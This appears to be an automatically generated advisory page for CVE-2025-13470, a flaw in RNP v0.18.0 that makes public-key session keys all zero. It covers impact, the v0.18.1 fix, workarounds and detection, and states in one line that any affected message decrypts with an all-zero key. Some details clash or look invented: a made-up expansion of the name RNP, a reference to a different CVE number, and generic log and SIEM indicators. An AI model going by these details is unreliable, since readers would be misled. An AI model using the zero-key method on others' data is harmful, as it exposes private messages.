CVE-2025-13470
📋 TL;DR
A regression in RNP v0.18.0 causes public-key encrypted session keys to always be all-zero bytes, allowing anyone to decrypt data encrypted with public keys in this version. This fully compromises confidentiality of encrypted data. Only users of RNP v0.18.0 who encrypt data using public keys are affected.
💻 Affected Systems
- RNP (Rising Network Privacy)
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
All data encrypted with public keys in v0.18.0 can be decrypted by anyone without the private key, leading to complete data exposure.
Likely Case
Attackers who intercept or access encrypted data can decrypt it trivially, exposing sensitive information.
If Mitigated
If data was encrypted with passphrases (SKESK) or using different versions, impact is limited.
🎯 Exploit Status
Exploitation requires only supplying all-zero session key to decrypt any data encrypted with vulnerable version. No authentication or special access needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v0.18.1
Vendor Advisory: https://github.com/rnpgp/rnp/releases/tag/v0.18.1
Restart Required: No
Instructions:
1. Upgrade RNP to version 0.18.1 or later. 2. Re-encrypt any data that was encrypted with version 0.18.0 using public keys.
🔧 Temporary Workarounds
Use passphrase encryption
allTemporarily use passphrase-based encryption (SKESK) instead of public-key encryption until patched
Downgrade to previous version
linuxRevert to RNP version 0.17.x or earlier
For Arch Linux: sudo pacman -U /var/cache/pacman/pkg/rnp-0.17.0-1-x86_64.pkg.tar.zst
🧯 If You Can't Patch
- Re-encrypt all data that was encrypted with v0.18.0 using a different encryption tool or method
- Isolate systems using v0.18.0 and restrict access to encrypted data
🔍 How to Verify
Check if Vulnerable:
Check RNP version: rnp --version. If output shows 0.18.0, system is vulnerable.Check Version:
rnp --versionVerify Fix Applied:
After upgrade, verify version is 0.18.1 or later with rnp --version📡 Detection & Monitoring
Log Indicators:
- Failed decryption attempts with zero keys
- Unusual successful decryption patterns
Network Indicators:
- Interception of encrypted data followed by successful decryption without proper keys
SIEM Query:
process.name:"rnp" AND version:"0.18.0" OR decryption.success:true AND key.source:"zero"🔗 References
- https://access.redhat.com/security/cve/cve-2025-13402
- https://aur.archlinux.org/packages/rnp
- https://bugzilla.redhat.com/show_bug.cgi?id=2415863
- https://github.com/rnpgp/rnp/commit/7bd9a8dc356aae756b40755be76d36205b6b161a
- https://github.com/rnpgp/rnp/releases/tag/v0.18.1
- https://launchpad.net/ubuntu/+source/rnp
- https://open.ribose.com/advisories/ra-2025-11-20/
- https://packages.gentoo.org/packages/dev-util/librnp
